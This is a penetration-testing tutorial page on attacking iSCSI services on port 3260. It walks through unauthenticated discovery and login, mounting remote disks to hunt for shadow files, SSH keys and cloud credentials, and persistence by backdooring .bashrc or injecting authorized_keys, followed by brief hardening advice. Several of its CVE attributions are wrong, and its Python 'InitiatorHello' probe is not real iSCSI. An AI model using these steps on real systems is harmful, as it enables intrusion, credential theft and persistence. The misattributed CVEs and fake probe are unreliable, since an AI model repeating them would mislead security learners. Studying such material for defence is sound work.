iScsi - Port 3260
Become VeryLazyTech member! π
Follow us on:
β Twitter @VeryLazyTech.
πΎ Github @VeryLazyTech.
π Medium @VeryLazyTech.
πΊ YouTube @VeryLazyTech.
π© Telegram @VeryLazyTech.
π΅οΈββοΈ My Site @VeryLazyTech.
Visit our shop for e-books and courses. π
What is iSCSI and Why is it Important?
iSCSI (Internet Small Computer Systems Interface) is a network protocol that allows clients (initiators) to send SCSI commands to storage devices (targets) over IP networks. It's commonly used in SAN (Storage Area Network) environments for centralized disk management and remote storage access.
Why iSCSI Matters in Security:
High-value targets: iSCSI often connects to critical infrastructure like databases and VMs.
Misconfigurations can lead to unauthenticated access or credential leaks.
Exposed iSCSI services can reveal disk images, file systems, and even credentials.
How iSCSI Works on Port 3260
Port 3260 handles the iSCSI target communication, where:
Initiators (clients) request access to storage blocks.
Targets (servers) expose storage resources via Logical Unit Numbers (LUNs).
iSCSI Protocol Flow:
Session Initiation via iSCSI login.
Discovery Phase: Client requests list of available targets.
Authentication: Optional but often skipped or weakly implemented.
Data Transfer: SCSI commands are encapsulated in TCP/IP.
Top Vulnerabilities in iSCSI
Below are common attack vectors in iSCSI deployments:
No Authentication
Default config allows any initiator to access targets.
Weak CHAP Credentials
Often reused or stored in plaintext.
Information Disclosure
Target names, volume names, and paths can leak sensitive info.
Exposure to the Internet
Misconfigured firewalls or open 3260 ports.
Unpatched CVEs
Older storage devices may run vulnerable firmware.
Enumeration Techniques with Tools (Nmap, Netcat, etc.)
Using Nmap
nmap -p 3260 -sV -Pn <target-ip> --script=iscsi-info
-p 3260
: Scan the iSCSI port--script=iscsi-info
: Attempts to extract target name and LUNs
Netcat for Banner Grabbing
nc <target-ip> 3260
You may get a raw iSCSI response showing protocol version or session response.
iscsiadm (Linux)
iscsiadm -m discovery -t sendtargets -p <target-ip>
Lists available iSCSI targets.
Works only if no auth is required or credentials are known.
Manual Exploitation: Hands-On Examples
Step 1: Target Discovery
iscsiadm -m discovery -t sendtargets -p 10.10.10.22
Output:
10.10.10.22:3260,1 iqn.2023-01.local.lab:storage.target1
Step 2: Login Without Authentication
iscsiadm -m node -T iqn.2023-01.local.lab:storage.target1 -p 10.10.10.22 --login
If successful, the system will map the remote disk locally (e.g., /dev/sdb
).
Step 3: Mount and Explore
fdisk -l
mount /dev/sdb1 /mnt
ls /mnt
Look for:
/etc/shadow
filesPassword backups
SSH keys
Configs containing internal IPs
Automated Exploitation with Tools
Metasploit iSCSI Modules
Metasploit has auxiliary modules for discovery:
msfconsole
use auxiliary/scanner/iscsi/iscsi_version
set RHOSTS <target-ip>
run
Nikto (Limited)
While Nikto isnβt iSCSI-specific, you can use it to fingerprint misconfigured web GUIs tied to SAN devices.
Custom Python Script Example
import socket
target = "10.10.10.22"
port = 3260
s = socket.socket()
s.connect((target, port))
s.send(b"InitiatorHello")
print(s.recv(1024))
s.close()
Real-World CVEs and Notable Exploits
CVE-2020-2732
iSCSI memory leak in certain Linux kernels
CVE-2015-1420
iSCSI stack buffer overflow in Netgear ReadyNAS
Exploit DB
CVE-2018-1000861
Remote command execution via iSCSI web management interface
Privilege Escalation Opportunities via this Service
Once access is gained to an iSCSI volume:
Look for saved credential files
.bash_history
,.ssh/id_rsa
,/etc/shadow
Search for sudoers misconfigurations
cat /mnt/etc/sudoers
Enumerate LVM volumes for hidden partitions
lvscan
If LUNs expose full disk images, mount them locally and search for:
SAM/NTDS.dit (Windows)
MySQL databases
AWS credentials
Post-Exploitation Tips and Persistence
Techniques:
Leave a backdoor in iSCSI shared volume
e.g.,
.bashrc
modification
Enable remote access via hidden SSH key
Inject key into
/home/user/.ssh/authorized_keys
Exfiltrate disk image for offline cracking
dd if=/dev/sdb of=disk.img bs=1M
Defense, Mitigation, and Hardening Techniques
Best Practices:
Always enable CHAP authentication
Whitelist initiator IPs
Limit access with firewall rules (block 3260 externally)
Use VLANs or separate subnets for SAN traffic
Regularly patch iSCSI daemons and firmware
Monitoring Tips:
Use Wireshark to inspect unauthorized iSCSI sessions.
Set up Syslog alerts for unusual discovery requests.
π Recommended Books
A hands-on guide packed with attack strategies, including lateral movement and exploitation of services like iSCSI. Perfect for red teamers.
Learn & practice For the Bug Bounty
Last updated
Was this helpful?